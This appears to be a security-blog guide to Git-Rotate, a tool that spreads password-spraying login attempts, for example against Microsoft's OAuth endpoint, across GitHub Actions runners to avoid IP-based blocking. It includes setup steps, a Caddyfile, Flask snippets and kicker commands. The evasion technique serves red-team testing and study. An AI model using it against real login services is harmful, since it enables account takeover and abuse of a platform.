Git-Rotate - Automating IP Rotation via GitHub Actions for Security Testing
Share
This guide explains how to use GitHub Actions for IP rotation in a proof-of-concept project called Git-Rotate. The project is designed for scenarios like password spraying or brute-forcing login endpoints while avoiding IP-based blocking.
It consists of three main components: the Kicker, the Sprayer, and the Catcher. Below, we will walk you through each component and provide step-by-step instructions to set up and use this system.
Important Note: Misusing GitHub Actions for abusive purposes violates GitHub's terms of service. This guide is for educational purposes only. You are responsible for adhering to all applicable laws and rules
Overview of Components
1. Kicker
The Kicker is a Python script that creates and populates workflow runs in GitHub Actions. It passes sensitive information (e.g., target URL, username, password, and Catcher IP address) to the workflow using GitHub secrets.
2. Sprayer
The Sprayer is a Python script executed by a GitHub Actions workflow run. It sends login requests to the target endpoint with username-password combinations and forwards the responses to the Catcher. Each workflow run uses a unique IP address, leveraging GitHub's distributed infrastructure.
3. Catcher
The Catcher is a Python Flask web server that processes login responses from the Sprayer. It determines whether login attempts succeed or fail and logs the results. A reverse proxy like Caddy is used to secure communication between components via TLS.
Setting Up Each Component
1.Setting Up the Sprayer
1.Create a new GitHub repository.
2.Add the following files:
sprayer
├── .github
│ └── workflows
│ └── sprayer.yml
├── requirements.txt
└── sprayer.py
3.The
sprayer.yml
workflow file should be configured to trigger on the
workflow_dispatch.
event, allowing it to be manually triggered via the REST API.
4.Ensure your
sprayer.py
script sends login requests to your target endpoint (e.g.,
https://login.microsoft.com/common/oauth2/token
) and forwards responses to the Catcher.
2. Setting Up the Catcher
The Catcher processes responses from the Sprayer and logs results.
With TLS (Recommended)
1.Use Caddy as a reverse proxy for secure HTTPS communication.
2.Create a
Caddyfile
with the following configuration (update domain name, path, and port as needed):
example.com {
header {
-Server
}
@notWowAmazing {
not path /wow-amazing
}handle @notWowAmazing {
respond "Not Found" 404
}handle {
reverse_proxy localhost:5000
}
}
3.Update your
catcher.py
script:
@app.route("/wow-amazing", methods=["POST"])
def handle_post_data():
data = request.get_json()
username = data.get("username")
# Process data here...
Start the Flask web app:
python3 catcher.py
Without TLS (Not Recommended)
1.Bind the Flask app to all interfaces:
if __name__ == "__main__":
app.run(host="0.0.0.0", port=5000)
2.Start the Flask web app:.
python3 catcher.py.
3. Setting Up the Kicker
The Kicker creates workflow runs in your GitHub repository.
1.Ensure you have a fine-grained GitHub access token with these permissions:
- Actions: Read & Write
- Secrets: Read & Write
2.Update your
config.ini
file with your GitHub account details:
[GitHub]
owner = <your-username>
repo = <your-repo-name>
token = <fine-grained-access-token>
3.Install dependencies for
kicker.py
4.Run the Kicker script with appropriate arguments:
If using HTTPS:
python3 kicker.py -u user-list.txt -p "Password123" -c https://example.com/wow-amazing -s
If using HTTP:
python3 kicker.py -u user-list.txt -p "Password123" -c http://example.com/wow-amazing
Demo
Once all components are set up:
-
Use the Kicker to trigger workflow runs in your repository.
-
The Sprayer will send login requests from unique IPs.
-
The Catcher will log responses securely.
This modular setup can be extended or modified for other targets or workflows as needed. You can learn more and Download Git-Rotate in GitHub.
Upgrade Your Cybersecurity Skills EHA: Learn 150+ Practical Cyber Security Courses Online With Life Time Access - Enroll Here